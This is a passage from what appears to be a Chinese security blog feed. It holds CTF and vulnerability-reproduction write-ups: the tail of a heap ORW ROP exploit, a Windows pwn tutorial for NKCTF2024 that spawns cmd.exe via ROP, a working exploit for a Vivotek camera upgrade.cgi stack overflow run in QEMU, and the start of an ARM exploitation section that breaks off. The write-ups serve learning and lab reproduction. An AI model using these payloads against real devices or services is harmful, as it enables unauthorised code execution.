class="hljs-number">0</span>x000000000011f2e7 <br><span class="hljs-attribute">open_addr</span> = libcbase + libc.sym['open']<br><span class="hljs-attribute">rax_addr</span> = libcbase + next(libc.search(asm(<span class="hljs-string">"pop rax;ret"</span>)))<br><span class="hljs-attribute">read_addr</span> = libcbase + libc.sym['read']<br><span class="hljs-attribute">write_addr</span> = libcbase + libc.sym['write']<br><span class="hljs-attribute">syscall_addr</span> = read_addr+<span class="hljs-number">0</span>x10<br><span class="hljs-attribute">payload</span> = b'flag\x00'<br><span class="hljs-attribute">payload</span> = payload.ljust(<span class="hljs-number">0</span>x68,b'\x00')+p64(setcontext)<br><span class="hljs-attribute">payload</span> = payload.ljust(<span class="hljs-number">0</span>xb0,b'\x00')+p64(fake_heap+<span class="hljs-number">0</span>xf0)+p64(ret_addr)<br><span class="hljs-attribute">payload</span> = payload.ljust(<span class="hljs-number">0</span>xd0,b'\x00')+p64(fake_heap)+p64(<span class="hljs-number">0</span>)*<span class="hljs-number">3</span>+p64(fake_heap-<span class="hljs-number">0</span>x10)+p64(<span class="hljs-number">0</span>)<br><span class="hljs-attribute">payload</span> += p64(rax_addr)+p64(<span class="hljs-number">2</span>)+p64(rdi_addr)+p64(flag_addr)+p64(rsi_addr)+p64(<span class="hljs-number">0</span>)+p64(syscall_addr)<br><span class="hljs-attribute">payload</span> += p64(rax_addr)+p64(<span class="hljs-number">0</span>)+p64(rdi_addr)+p64(<span class="hljs-number">3</span>)+p64(rsi_addr)+p64(fake_heap+<span class="hljs-number">0</span>x4000)+p64(rdx_r12_addr)+p64(<span class="hljs-number">0</span>x100)*<span class="hljs-number">2</span>+p64(syscall_addr)<br><span class="hljs-attribute">payload</span> += p64(rax_addr)+p64(<span class="hljs-number">1</span>)+p64(rdi_addr)+p64(<span class="hljs-number">1</span>)+p64(rsi_addr)+p64(fake_heap+<span class="hljs-number">0</span>x4000)+p64(rdx_r12_addr)+p64(<span class="hljs-number">0</span>x100)*<span class="hljs-number">2</span>+p64(syscall_addr)<br><span class="hljs-attribute">edit</span>(<span class="hljs-number">2</span>,payload)<br><span class="hljs-attribute">dbg</span>()<br><span class="hljs-attribute">cmd</span>(<span class="hljs-number">5</span>)<br><span class="hljs-attribute">ia</span>()<br></code></pre></td></tr></table></figure>]]></content>
</entry>
<entry>
<title>winpwn入门</title>
<link href="/2024/04/07/winpwn%E5%85%A5%E9%97%A8/"/>
<url>/2024/04/07/winpwn%E5%85%A5%E9%97%A8/</url>
<content type="html"><![CDATA[<h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>nkctf刚好有一道winpwn的题,题目比较简单就顺便学了一下,主要是一些调试还有攻击的技巧</p><p>参考:</p><p><a href="https://xz.aliyun.com/t/11865?time__1311=mqmx0DBD9DyDnDfx4BuQx20UeyDtiiQYieD&alichlgref=https://xz.aliyun.com/u/62994">z1r0</a></p><h1 id="安装checksec"><a href="#安装checksec" class="headerlink" title="安装checksec"></a>安装checksec</h1><p><a href="https://github.com/Wenzel/checksec.py">https://github.com/Wenzel/checksec.py</a></p><p>到他的releases下载<a href="https://github.com/Wenzel/checksec.py/releases/download/v0.6.2/checksec.exe">checksec.exe</a></p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202404072122678.png" alt="image-20240407212232225"></p><h1 id="安装winserver"><a href="#安装winserver" class="headerlink" title="安装winserver"></a>安装winserver</h1><p><a href="https://github.com/Ex-Origin/win_server">https://github.com/Ex-Origin/win_server</a></p><p>这个就像搭建pwn题一样,把exe给映射到一个端口上</p><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">git clone https:<span class="hljs-regexp">//gi</span>thub.com<span class="hljs-regexp">/Ex-Origin/</span>win_server.git<br></code></pre></td></tr></table></figure><p>如上git clone之后即可使用,用法:<code>.\win_server.exe a.exe 1234</code>就可以把a.exe给映射到1234端口上,试着用nc连接一下,发现可以正常的执行程序</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202404072125725.png" alt="image-20240407212557512"></p><p>这样就可以正常使用pwntools去做winpwn了,同样也方便使用ida调试程序</p><h1 id="winpwn保护机制"><a href="#winpwn保护机制" class="headerlink" title="winpwn保护机制"></a>winpwn保护机制</h1><p>NX:这个在win上其实是DEP,堆栈不可执行保护</p><p>Canary:这个在win上其实是GS,可能这个工具的开发者为了让我们更好理解才写了Canary,但是需要注意的是这个工具的canary检测可能检测不准</p><p>ASLR:通俗讲就是地址随机化,让exe和dll的地址全部随机,所以就有了大名鼎鼎<strong>Heap Spray</strong>(堆喷)利用技术,Heap Spray是在shellcode的前面加上大量的slide code(滑板指令),组成一个注入代码段。然后向系统申请大量内存,并且反复用注入代码段来填充。这样就使得进程的地址空间被大量的注入代码所占据。然后结合其他的漏洞攻击技术控制程序流,使得程序执行到堆上,最终将导致shellcode的执行。</p><p>Dynamic Base:程序编译时可通过/DYNAMICBASE编译选项指示程序是否利用ASLR的功能</p><p>High Entropy VA:如果指定此选项,则当内核将进程的地址空间布局随机化为 ASLR 的一部分时,兼容版本的 Windows 内核可以使用更高的熵。 如果内核使用更高的熵,则可以将更多的地址分配给堆栈和堆等内存区域。 因此,更难猜测特定内存区域的位置。当该选项打开时,当这些模块作为 64 位进程运行时,目标可执行文件和它所依赖的任何模块必须能够处理大于 4 GB 的指针值。</p><p>SEH:结构化异常处理(Structured Exception Handling,简称 SEH)是一种Windows 操作系统对错误或异常提供的处理技术。SEH 是 Windows操作系统的一种系统机制,本身与具体的程序设计语言无关。SEH 为Windows的设计者提供了程序错误或异常的处理途径,使得系统更加健壮</p><p>SafeSEH:为了防止攻击者通过覆盖堆栈上的异常处理函数句柄,从而控制程序执行流程的攻击,在调用异常处理函数之前,对要调用的异常处理函数进行一系列的有效性校验,如果发现异常处理函数不可靠,立即终止异常处理函数的调用。不过SafeSEH需要编译器和系统双重支持,缺少一个则保护能力基本就丧失了</p><p>Force Integrity:强制签名保护</p><p>Control Flow Guard:控制Flow防护 (CFG) 是一项高度优化的平台安全功能,旨在打击内存损坏漏洞。 通过严格限制应用程序可以从何处执行代码,利用漏洞(如缓冲区溢出)执行任意代码会更加困难</p><p>Isolation:隔离保护,默认会开启</p><p>Authenticode:签名保护</p><h1 id="ida调试"><a href="#ida调试" class="headerlink" title="ida调试"></a>ida调试</h1><h2 id="ida直接调试程序"><a href="#ida直接调试程序" class="headerlink" title="ida直接调试程序"></a>ida直接调试程序</h2><p>先F2下个断点</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202404072147961.png" alt="image-20240407214749900"></p><p>F9选择Local Windows debugger,然后OK就行了</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202404072146737.png" alt="image-20240407214646654"></p><p>这里就可以开始调试了</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202404072149394.png" alt="image-20240407214934259"></p><h2 id="结合exp调试"><a href="#结合exp调试" class="headerlink" title="结合exp调试"></a>结合exp调试</h2><p>这里选择attach to process,然后用前面的winserver把服务跑起来,在虚拟机里面跑exp,连接上程序,然后选择对应的进程就可以调试了</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202404072150216.png" alt="image-20240407215036153"></p><p>这里可以看到已经调试到我们exp跑的对应的进程里面去了</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202404072154988.png" alt="image-20240407215410841"></p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202404072155927.png" alt="image-20240407215529896"></p><h1 id="例题-NKCTF2024-签到"><a href="#例题-NKCTF2024-签到" class="headerlink" title="例题:NKCTF2024 签到"></a>例题:NKCTF2024 签到</h1><p>明显的有格式化字符串和栈溢出漏洞,因为不太清楚winpwn的libc的格式,所以这里没用格式化字符串漏洞去泄露libc,这里笔者选择了先用格式化字符串漏洞泄露出canary,然后rop泄露出puts的真实地址(这里需要注意的是winpwn不知道为什么无法使用%x$p),必须输入一长串的%p才能够泄露</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202404072157970.png" alt="image-20240407215717918"></p><p>然后题目也给了msvcrt.dll,用ida把puts,system,cmd.exe的偏移都找出来,然后直接写rop就行了</p><figure class="highlight vim"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br></pre></td><td class="code"><pre><code class="hljs vim">from pwn import *<br>from ctypes import *<br>from struct import pack<br>#libc=ELF(<span class="hljs-string">"/lib/x86_64-linux-gnu/libc.so.6"</span>)<br>ip = <span class="hljs-string">'192.168.3.113'</span><br>port = <span class="hljs-number">1234</span><br>local = <span class="hljs-number">0</span><br><span class="hljs-keyword">if</span> local:<br> io = process(banary)<br><span class="hljs-keyword">else</span>:<br> io = remote(ip, port)<br><br>context(log_level = <span class="hljs-string">'debug'</span>, os = <span class="hljs-string">'linux'</span>, arch = <span class="hljs-string">'amd64'</span>)<br>#context(log_level = <span class="hljs-string">'debug'</span>, os = <span class="hljs-string">'linux'</span>, arch = <span class="hljs-string">'i386'</span>)<br><br>def dbg():<br> gdb.attach(io)<br> pause()<br><br>s = lambda data : io.send(data)<br><span class="hljs-keyword">sl</span> = lambda data : io.sendline(data)<br><span class="hljs-keyword">sa</span> = lambda text, data : io.sendafter(text, data)<br><span class="hljs-keyword">sla</span> = lambda text, data : io.sendlineafter(text, data)<br>r = lambda : io.recv()<br><span class="hljs-keyword">ru</span> = lambda text : io.recvuntil(text)<br>uu32 = lambda : u32(io.recvuntil(<span class="hljs-keyword">b</span><span class="hljs-string">"\xff"</span>)[-<span class="hljs-number">4</span>:].ljust(<span class="hljs-number">4</span>, <span class="hljs-keyword">b</span><span class="hljs-string">'\x00'</span>))<br>uu64 = lambda : u64(io.recvuntil(<span class="hljs-keyword">b</span><span class="hljs-string">"\x7f"</span>)[-<span class="hljs-number">6</span>:].ljust(<span class="hljs-number">8</span>, <span class="hljs-keyword">b</span><span class="hljs-string">"\x00"</span>))<br>iuu32 = lambda : <span class="hljs-keyword">int</span>(io.recv(<span class="hljs-number">10</span>),<span class="hljs-number">16</span>)<br>iuu64 = lambda : <span class="hljs-keyword">int</span>(io.recv(<span class="hljs-number">6</span>),<span class="hljs-number">16</span>)<br>uheap = lambda : u64(io.recv(<span class="hljs-number">6</span>).ljust(<span class="hljs-number">8</span>,<span class="hljs-keyword">b</span><span class="hljs-string">'\x00'</span>))<br><span class="hljs-keyword">lg</span> = lambda data : io.success(<span class="hljs-string">'%s -> 0x%x'</span> % (data, <span class="hljs-built_in">eval</span>(data)))<br><span class="hljs-keyword">ia</span> = lambda : io.interactive()<br><br>puts_plt=<span class="hljs-number">0</span>x0403F8C<br>puts_got=<span class="hljs-number">0</span>x0409230<br><br>pause()<br><span class="hljs-keyword">ru</span>(<span class="hljs-string">"NKCTF2024\r\n"</span>)<br>payload=<span class="hljs-keyword">b</span><span class="hljs-string">'%p'</span>*<span class="hljs-number">0</span>x1e+<span class="hljs-keyword">b</span><span class="hljs-string">'S'</span>+<span class="hljs-keyword">b</span><span class="hljs-string">'%p'</span><br><span class="hljs-keyword">sl</span>(payload)<br><span class="hljs-keyword">ru</span>(<span class="hljs-keyword">b</span><span class="hljs-string">'S'</span>)<br>canary=<span class="hljs-keyword">int</span>(io.recv(<span class="hljs-number">8</span>),<span class="hljs-number">16</span>)<br><span class="hljs-keyword">lg</span>(<span class="hljs-string">"canary"</span>)<br><br><span class="hljs-keyword">ru</span>(<span class="hljs-string">"ohhh,no"</span>)<br>payload=<span class="hljs-keyword">b</span><span class="hljs-string">'A'</span>*(<span class="hljs-number">0</span>x70-<span class="hljs-number">0</span>xc)+p32(canary)+<span class="hljs-keyword">b</span><span class="hljs-string">'A'</span>*<span class="hljs-number">8</span>+<span class="hljs-keyword">b</span><span class="hljs-string">'A'</span>*<span class="hljs-number">4</span>+p32(puts_plt)+p32(<span class="hljs-number">0</span>x00401473)+p32(puts_got)<br><span class="hljs-keyword">sl</span>(payload)<br><br><span class="hljs-string">""</span><span class="hljs-comment">"</span><br>#remote<br>dll_base=u32(io.recv(<span class="hljs-number">4</span>))-<span class="hljs-number">0</span>x1017BA80<br><span class="hljs-keyword">lg</span>(<span class="hljs-string">"dll_base"</span>)<br><span class="hljs-built_in">system</span>=dll_base+<span class="hljs-number">0</span>x10144700<br>cmd=dll_base+<span class="hljs-number">0</span>x101048C8<br><span class="hljs-string">""</span><span class="hljs-comment">"</span><br>#local<br>dll_base=u32(io.recv(<span class="hljs-number">4</span>))-<span class="hljs-number">0</span>x10179E20<br><span class="hljs-keyword">lg</span>(<span class="hljs-string">"dll_base"</span>)<br><span class="hljs-built_in">system</span>=dll_base+<span class="hljs-number">0</span>x10143D30<br>cmd=dll_base+<span class="hljs-number">0</span>x101047A4<br><br><span class="hljs-keyword">ru</span>(<span class="hljs-string">"NKCTF2024\r\n"</span>)<br>payload=<span class="hljs-keyword">b</span><span class="hljs-string">'%p'</span>*<span class="hljs-number">0</span>x1e+<span class="hljs-keyword">b</span><span class="hljs-string">'S'</span>+<span class="hljs-keyword">b</span><span class="hljs-string">'%p'</span><br><span class="hljs-keyword">sl</span>(payload)<br><br>pause()<br><span class="hljs-keyword">ru</span>(<span class="hljs-string">"ohhh,no"</span>)<br>payload=<span class="hljs-keyword">b</span><span class="hljs-string">'A'</span>*(<span class="hljs-number">0</span>x70-<span class="hljs-number">0</span>xc)+p32(canary)+<span class="hljs-keyword">b</span><span class="hljs-string">'A'</span>*<span class="hljs-number">8</span>+<span class="hljs-keyword">b</span><span class="hljs-string">'A'</span>*<span class="hljs-number">4</span>+p32(<span class="hljs-built_in">system</span>)+p32(<span class="hljs-number">0</span>)+p32(cmd)<br><span class="hljs-keyword">sl</span>(payload)<br><br><br><span class="hljs-keyword">ia</span>()<br></code></pre></td></tr></table></figure><p>这里还要注意的是需要把debug打开来,然后用type flag.txt才能看到flag,不知道是不是因为编码格式的问题,不开debug是看不到打印出来的字符串的</p>]]></content>
</entry>
<entry>
<title>vivotek摄像头栈溢出漏洞复现</title>
<link href="/2024/03/22/vivotek%E6%91%84%E5%83%8F%E5%A4%B4%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/"/>
<url>/2024/03/22/vivotek%E6%91%84%E5%83%8F%E5%A4%B4%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/</url>
<content type="html"><![CDATA[<p>参考链接:</p><p><a href="https://p1kk.github.io/2021/04/14/iot/vivotek%20%E6%91%84%E5%83%8F%E5%A4%B4%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/">https://p1kk.github.io/2021/04/14/iot/vivotek%20%E6%91%84%E5%83%8F%E5%A4%B4%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/</a></p><p><a href="https://github.com/Vu1nT0tal/IoT-vulhub/tree/master/VIVOTEK/remote_stack_overflow">https://github.com/Vu1nT0tal/IoT-vulhub/tree/master/VIVOTEK/remote_stack_overflow</a></p><h1 id="环境模拟"><a href="#环境模拟" class="headerlink" title="环境模拟"></a>环境模拟</h1><p>首先用binwalk解包会获得一个比较复杂的目录,先找下squashfs在哪</p><figure class="highlight elixir"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs elixir">youlin<span class="hljs-variable">@ubuntu</span><span class="hljs-symbol">:~/rw/VIVOTEK/remote_stack_overflow/firmware/_CC8160-VVTK-</span><span class="hljs-number">0100</span>d.flash.pkg.extracted<span class="hljs-variable">$ </span>find -name squ*<br>./_31.extracted/_rootfs.img.extracted/squashfs-root<span class="hljs-number">-0</span><br>./_31.extracted/_rootfs.img.extracted/squashfs-root<br>youlin<span class="hljs-variable">@ubuntu</span><span class="hljs-symbol">:~/rw/VIVOTEK/remote_stack_overflow/firmware/_CC8160-VVTK-</span><span class="hljs-number">0100</span>d.flash.pkg.extracted$<br></code></pre></td></tr></table></figure><p>然后就是确认下架构</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202403222144017.png" alt="image-20240322214444893"></p><p>这里我选择的是用qemu的系统级模拟,设置好网卡后,将文件系统上传,然后挂载一下/dev和/proc</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash">mount -t proc /proc ./squashfs-root/proc<br>mount -o <span class="hljs-built_in">bind</span> /dev ./squashfs-root/dev<br></code></pre></td></tr></table></figure><p>接着就可以尝试启动httpd服务了</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202403222151720.png" alt="image-20240322215149691"></p><p>看到上面报错,在ida中查一下boa.conf的路径</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202403222152998.png" alt="image-20240322215259964"></p><p>在我们binwalk解包出来的文件中也有这个,直接将一整个目录传到对应的地方去</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202403222157151.png" alt="image-20240322215703123"></p><p>然后报错就变成这个了,在ida中找会触发这个报错的地方</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202403222158866.png" alt="image-20240322215814826"></p><p>利用了gethostbyname()函数,返回rlimits结构体中通过主机名找到的ip地址,像下面这样改就可以了,这样httpd服务就已经跑起来了</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202403222200381.png"></p><h1 id="漏洞分析以及调试"><a href="#漏洞分析以及调试" class="headerlink" title="漏洞分析以及调试"></a>漏洞分析以及调试</h1><p>一个strncpy造成的栈溢出漏洞</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202403222201129.png" alt="image-20240322220115102"></p><ul><li><p>strncpy()用来复制字符串的前n个字符,其原型为:<br><code>char * strncpy(char *dest, const char *src, size_t n);</code></p><p>【参数说明】dest 为目标字符串指针,src 为源字符串指针。</p><p>strncpy()会将字符串src前n个字符拷贝到字符串dest。</p><p>不像strcpy(),<strong>strncpy()不会向dest追加结束标记’\0’</strong>,这就引发了很多不合常理的问题,将在下面的示例中说明。</p><p>注意:src 和 dest 所指的内存区域不能重叠,且 dest 必须有足够的空间放置n个字符。</p><p>【返回值】返回字符串dest。</p></li><li><p>strchr() 用来查找某字符在字符串中首次出现的位置,其原型为:<br><code>char * strchr (const char *str, int c);</code></p><p>【参数】str 为要查找的字符串,c 为要查找的字符。</p><p>strchr() 将会找出 <strong>str 字符串中第一次出现的字符 c 的地址</strong>,然后将该地址返回。</p><p>注意:字符串 str 的结束标志 NUL 也会被纳入检索范围,所以 str 的组后一个字符也可以被定位。</p><p>【返回值】如果找到指定的字符则返回该字符所在地址,否则返回 NULL。</p><p>返回的地址是字符串在内存中随机分配的地址再加上你所搜索的字符在字符串位置。设字符在字符串中首次出现的位置为 i,那么返回的地址可以理解为 str + i。</p><p>poc:</p></li></ul><figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs pgsql"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">import</span> requests<br><br><span class="hljs-keyword">header</span> = {<br>"Content-Length":"aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa"<br>}<br><br>url = "http://192.168.65.2" + "/cgi-bin/admin/upgrade.cgi"<br><br><br><span class="hljs-keyword">session</span> = requests.<span class="hljs-keyword">session</span>()<br><span class="hljs-keyword">session</span>.post(url, headers=<span class="hljs-keyword">header</span>)<br></code></pre></td></tr></table></figure><p>这里可以测出溢出的长度是51,接着就是考虑arm的栈溢出利用了</p><h1 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h1><p>其实在测出溢出的长度是51之后,利用都比较简单了,但是需要注意的是因为造成溢出的是strncpy函数,所以payload当中不能有’\x00’,于是只能将aslr关掉之后用libc当中的gadget,并且不能直接用pop {r0,pc}这个gadget,地址当中含有\x00</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202403230054749.png" alt="image-20240323005449617"></p><p>所以选择用pop {r1,pc}和mov r0,r1来代替</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202403230056475.png" alt="image-20240323005650421"></p><p>exp:</p><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><code class="hljs routeros"><span class="hljs-keyword">from</span> pwn import *<br>import requests<br><span class="hljs-attribute">libc</span>=ELF("libuClibc-0.9.33.3-git.so")<br><br><span class="hljs-attribute">libcbase</span>=0x76f2d000<br><span class="hljs-attribute">pop_r0</span>=libcbase+0x00033100<br><span class="hljs-attribute">pop_r1</span>=libcbase+0x00048784<br><span class="hljs-attribute">mov_r0_r1</span>=0x00016aa4+libcbase #mov r0, r1; pop {r4, r5, pc};<br><span class="hljs-attribute">system</span>=libcbase+libc.sym[<span class="hljs-string">'system'</span>]<br><span class="hljs-attribute">cmd_addr</span>=0x7effeb74<br><span class="hljs-attribute">cmd</span>=b'echo <span class="hljs-string">"pwned_sucess"</span> > /tmp/test.txt;<span class="hljs-string">'</span><br><span class="hljs-string"></span><br><span class="hljs-string">payload=b'</span>A<span class="hljs-string">'*51+p32(pop_r1)+p32(cmd_addr)+p32(mov_r0_r1)+b'</span>A<span class="hljs-string">'*8+p32(system)+cmd</span><br><span class="hljs-string">#payload=b'</span>A<span class="hljs-string">'*51+b'</span>B<span class="hljs-string">'*4</span><br><span class="hljs-string"></span><br><span class="hljs-string">header = {</span><br><span class="hljs-string">"Content-Length":payload</span><br><span class="hljs-string">}</span><br><span class="hljs-string"></span><br><span class="hljs-string">url = "http://192.168.182.111" + "/cgi-bin/admin/upgrade.cgi"</span><br><span class="hljs-string"></span><br><span class="hljs-string"></span><br><span class="hljs-string">session = requests.session()</span><br><span class="hljs-string">session.post(url, headers=header)</span><br></code></pre></td></tr></table></figure><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202403230104802.png" alt="image-20240323010452749"></p>]]></content>
</entry>
<entry>
<title>异构学习</title>
<link href="/2024/03/15/%E5%BC%82%E6%9E%84%E5%AD%A6%E4%B9%A0/"/>
<url>/2024/03/15/%E5%BC%82%E6%9E%84%E5%AD%A6%E4%B9%A0/</url>
<content type="html"><![CDATA[<h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>异构的getshell与命令执行这方面一直都比较薄弱,虽然之前星盟里面国资师傅有过培训,但是内容都比较简单,在真实的iot设备方面的构造还是有所欠缺,所以这次重新学习一下这方面的内容</p><p>参考链接:</p><p><a href="https://github.com/ReAbout/pwn-exercise-iot">https://github.com/ReAbout/pwn-exercise-iot</a></p><h1 id="arm架构"><a href="#arm架构" class="headerlink" title="arm架构"></a>arm架构</h1><h2 id="基础知识"><a href="#基础知识" class="headerlink" title="基础知识"></a>基础知识</h2><h3 id="arm函数调用约定"><a href="#arm函数调用约定" class="headerlink" title="arm函数调用约定"></a>arm函数调用约定</h3><p>ARM 32位:</p><ul><li>参数1-参数4 分别保存到 R0-R3 寄存器中 ,剩下的参数从右往左依次入栈,被调用者实现栈平衡,返回值存放在 R0 中。</li><li>ARM中使用R0作为默认的返回值。 ARM 64位:</li><li>参数1-参数8 分别保存到 X0-X7 寄存器中 ,剩下的参数从右往左依次入栈,被调用者实现栈平衡,返回值存放在 X0 中。</li></ul><p><a href="https://bbs.pediy.com/thread-224583.htm">常见函数调用约定(x86、x64、arm、arm64)</a></p><h3 id="arm汇编"><a href="#arm汇编" class="headerlink" title="arm汇编"></a>arm汇编</h3><p><a href="https://b0ldfrev.gitbook.io/note/iot/mipsarm-hui-bian-xue-xi#arm">https://b0ldfrev.gitbook.io/note/iot/mipsarm-hui-bian-xue-xi#arm</a></p><h2 id="pwn例题-typo"><a href="#pwn例题-typo" class="headerlink" title="pwn例题:typo"></a>pwn例题:typo</h2><p>binary:<a href="https://github.com/ReAbout/pwn-exercise-iot/blob/main/linux_arm_stack/arm_pwn_typo/typo">typo</a></p><p>两种方法</p><h3 id="1-ret2shellcode"><a href="#1-ret2shellcode" class="headerlink" title="1.ret2shellcode"></a>1.ret2shellcode</h3><p>这种方法没记错的话只能在自己本地打通,因为是通过调试获取的栈地址会随着qemu发生变化,在远程大概率栈地址是不一样的</p><p>直接通过调试获得偏移地址,接着把shellcode写在栈上,然后覆盖返回地址为shellcode的地址就可以了</p><p>exp:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> ctypes <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> struct <span class="hljs-keyword">import</span> pack<br><span class="hljs-comment">#banary = "./pwn"</span><br><span class="hljs-comment">#elf = ELF(banary)</span><br><span class="hljs-comment">#libc = ELF("./libc.so.6")</span><br><span class="hljs-comment">#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")</span><br>ip = <span class="hljs-string">''</span><br>port = <span class="hljs-number">0</span><br>local = <span class="hljs-number">0</span><br><span class="hljs-keyword">if</span> local:<br> io = process([<span class="hljs-string">"qemu-arm-static"</span>,<span class="hljs-string">"-L"</span>,<span class="hljs-string">"/usr/arm-linux-gnueabi"</span>,<span class="hljs-string">"./typo"</span>])<br><span class="hljs-keyword">else</span>:<br> io = process([<span class="hljs-string">"qemu-arm-static"</span>,<span class="hljs-string">"-L"</span>,<span class="hljs-string">"/usr/arm-linux-gnueabi"</span>,<span class="hljs-string">"-g"</span>,<span class="hljs-string">"1234"</span>,<span class="hljs-string">"./typo"</span>])<br><br>context(log_level = <span class="hljs-string">'debug'</span>, os = <span class="hljs-string">'linux'</span>, arch = <span class="hljs-string">'arm'</span>)<br><span class="hljs-comment">#context(log_level = 'debug', os = 'linux', arch = 'i386')</span><br><br><span class="hljs-keyword">def</span> 